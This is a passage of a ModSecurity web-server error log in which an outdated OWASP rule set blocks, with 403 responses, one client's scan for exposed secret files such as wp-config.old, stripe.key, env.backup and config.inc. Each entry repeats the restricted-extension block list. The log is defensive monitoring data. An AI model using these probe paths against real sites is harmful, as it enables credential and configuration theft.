.cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab3S3s8oNmzkT9Qwc5JQHgAAAlc"] [Sat Mar 21 01:06:24.917850 2026] [:error] [pid 24907:tid 24953] [client 185.177.72.50:26144] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab3S8PXv_S1Spy7c8F7RvAAAAg0"] [Sat Mar 21 01:06:26.318573 2026] [:error] [pid 24750:tid 24804] [client 185.177.72.50:26206] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab3S8rSUB5e86eMr5pgHEQAAAdE"] [Sat Mar 21 01:06:33.066226 2026] [:error] [pid 24907:tid 24972] [client 185.177.72.50:21462] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab3S-fXv_S1Spy7c8F7SCQAAAhA"] [Sat Mar 21 01:06:34.557170 2026] [:error] [pid 14300:tid 14346] [client 185.177.72.50:21224] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab3S-rR4r1NodKcenf7EWgAAAIQ"] [Sat Mar 21 01:06:37.722677 2026] [:error] [pid 28049:tid 28104] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab3S_Zlj0-aQnXOSFX--WwAAAwI"] [Sat Mar 21 01:06:37.729937 2026] [:error] [pid 28225:tid 28330] [client 185.177.72.50:23232] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab3S_QhuEB-NImvLc2wb4gAAA1M"] [Sat Mar 21 01:06:37.737500 2026] [:error] [pid 28049:tid 28116] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab3S_Zlj0-aQnXOSFX--YgAAAw4"] [Sat Mar 21 01:06:37.803769 2026] [:error] [pid 28049:tid 28102] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab3S_Zlj0-aQnXOSFX--ZgAAAwA"] [Sat Mar 21 01:06:37.846926 2026] [:error] [pid 28049:tid 28126] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab3S_Zlj0-aQnXOSFX--ZwAAAxg"] [Sat Mar 21 01:06:37.881520 2026] [:error] [pid 28049:tid 28102] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab3S_Zlj0-aQnXOSFX--aQAAAwA"] [Sat Mar 21 01:06:39.013912 2026] [:error] [pid 28049:tid 28102] [client 185.177.72.50:22796] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab3S_5lj0-aQnXOSFX--bQAAAwA"] [Sat Mar 21 01:06:41.409655 2026] [:error] [pid 25090:tid 25174] [client 185.177.72.50:44260] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab3TAc8oNmzkT9Qwc5JREgAAAlE"] [Sat Mar 21 01:06:41.430994 2026] [:error] [pid 14298:tid 14319] [client 185.177.72.50:44188] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab3TAbmQJQAcPl9RRRGPHQAAABA"] [Sat Mar 21 01:06:41.507605 2026] [:error] [pid 25090:tid 25174] [client 185.177.72.50:44260] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab3TAc8oNmzkT9Qwc5JREwAAAlE"] [Sat Mar 21 01:06:41.562065 2026] [:error] [pid 28292:tid 28505] [client 185.177.72.50:44296] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab3TAT8spdQRjMGk3Ydu0AAAA5A"] [Sat Mar 21 01:06:42.425982 2026] [:error] [pid 27949:tid 28017] [client 185.177.72.50:44246] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab3TAnOsYaeu26ps-LBFIgAAAtY"] [Sat Mar 21 01:06:42.511519 2026] [:error] [pid 17713:tid 17792] [client 185.177.72.50:44652] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab3TAuWNdVzdR4d4e6ZLcQAAAQI"] [Sat Mar 21 01:06:43.293802 2026] [:error] [pid 14298:tid 14326] [client 185.177.72.50:44532] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab3TA7mQJQAcPl9RRRGPKAAAABc"] [Sat Mar 21 01:06:56.500706 2026] [:error] [pid 25090:tid 25143] [client 185.177.72.50:47738] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab3TEM8oNmzkT9Qwc5JRagAAAkA"] [Sat Mar 21 01:06:56.613113 2026] [:error] [pid 27949:tid 28009] [client 185.177.72.50:47664] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab3TEHOsYaeu26ps-LBFYgAAAs4"] [Sat Mar 21 01:07:01.055152 2026] [:error] [pid 27949:tid 28014] [client 185.177.72.50:47808] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab3TFXOsYaeu26ps-LBFbQAAAtM"] [Sat Mar 21 01:07:01.087157 2026] [:error] [pid 25090:tid 25182] [client 185.177.72.50:48044] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/error.log"] [unique_id "ab3TFc8oNmzkT9Qwc5JRrAAAAlY"] [Sat Mar 21 01:07:01.119242 2026] [:error] [pid 28049:tid 28106] [client 